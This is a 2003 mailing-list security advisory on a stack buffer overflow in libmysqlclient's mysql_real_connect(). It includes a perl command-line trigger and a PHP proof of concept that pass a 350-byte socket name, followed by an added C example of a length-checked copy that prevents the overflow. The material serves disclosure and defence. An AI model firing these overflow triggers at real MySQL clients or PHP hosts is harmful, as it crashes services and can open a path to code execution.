Message-ID: <3EE88DA9.1020006@scan-associates.net>
Date: Thu, 12 Jun 2003 22:26:49 +0800
From: pokleyzz <pokleyzz@...n-associates.net>
To: bugtraq@...urityfocus.com, wulnwatch@...nwatch.net,
full-disclosure@...ts.netsys.com, tech@...n-associates.net
Subject: libmysqlclient 4.x and below mysql_real_connect() buffer overflow.
SCAN Associates Sdn Bhd Security Advisory
Products: libmysqlclient 4.x and below (http://www.mysql.com)
Date: 12 June 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: http://www.scan-associates.net
Summary: libmysqlclient 4.x and below mysql_real_connect() buffer overflow.
Description
===========
libmysqlclient is the client library used to communicate with a MySQL server.
Details
=======
There is a stack buffer overflow in the mysql_real_connect() function when it
is passed a long Unix socket name (over 300 characters).
ex:
mysql -S `perl -e 'print "A" x 350'` -hlocalhost
proof of concept
----------------
This bug was successfully tested against PHP running in safe_mode, using our
latest Geeklog bug (http://www.scan-associates.net/papers/geeklog.txt), where
a user can upload *.php files.
<?php
// Build a 350-byte socket name, longer than the buffer mysql_real_connect() copies it into.
$buff = "";
for ($i = 0; $i < 350; $i++)
    $buff .= "A";
// Point the client library at the oversized socket path, then trigger the connect.
ini_set("mysql.default_socket", $buff);
mysql_connect("localhost", "blabla", "blabla");
?>
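The defect described above is a fixed-size stack buffer receiving a caller-controlled socket path without a length check. The following C program is an added illustration, not code from this advisory and not MySQL's own fix: it shows the bounded copy a client library should perform before using a socket path. The function name copy_socket_path and the helper build_long_name are assumptions introduced here. The length limit is taken from the kernel's sockaddr_un.sun_path (108 bytes on Linux), since a path that does not fit there could never be used by connect() anyway, so rejecting it early loses nothing.

```c
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Largest Unix socket path connect() can use: sun_path minus the terminating NUL. */
#define SOCKET_PATH_MAX (sizeof(((struct sockaddr_un *)0)->sun_path) - 1)

/*
 * Copy a caller-supplied Unix socket path into a fixed-size buffer, but only
 * if it fits both the destination and sockaddr_un.sun_path.
 * Returns 0 on success and -1 if the name is rejected (NULL, unterminated
 * within dstlen, or too long). On -1 the destination is left untouched.
 * Hypothetical helper written for this example.
 */
int copy_socket_path(const char *name, char *dst, size_t dstlen)
{
    const char *nul;
    size_t len;

    if (name == NULL || dst == NULL || dstlen == 0)
        return -1;

    /* Look for the terminator only within what we could possibly store. */
    nul = memchr(name, '\0', dstlen);
    if (nul == NULL)
        return -1;              /* no NUL within dstlen bytes: would overflow dst */

    len = (size_t)(nul - name);
    if (len > SOCKET_PATH_MAX)
        return -1;              /* valid C string, but unusable as a socket path */

    memcpy(dst, name, len + 1); /* len + 1 copies the NUL; len <= dstlen - 1 here */
    return 0;
}

/* Constructed test input: n bytes of 'A', like the perl/PHP examples in the advisory. */
size_t build_long_name(char *buf, size_t buflen, size_t n)
{
    size_t i;
    if (buflen == 0)
        return 0;
    if (n >= buflen)
        n = buflen - 1;
    for (i = 0; i < n; i++)
        buf[i] = 'A';
    buf[n] = '\0';
    return n;
}

int main(void)
{
    char path[sizeof(((struct sockaddr_un *)0)->sun_path)];
    char attack[512];

    build_long_name(attack, sizeof attack, 350);
    printf("350 x 'A'        : %s\n",
           copy_socket_path(attack, path, sizeof path) == 0 ? "accepted" : "rejected");
    printf("/tmp/mysql.sock  : %s\n",
           copy_socket_path("/tmp/mysql.sock", path, sizeof path) == 0 ? "accepted" : "rejected");
    return 0;
}
```

Run as written, the 350-byte name is rejected and the normal socket path is accepted. The same check applies to any client-side setting that ends up in a fixed stack buffer (here the PHP mysql.default_socket value): validate the length against the smallest buffer on the path before copying, rather than trusting the configuration source.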
Vendor Response
===============
The vendor was contacted on 06/01/2003 and a fix will be available soon.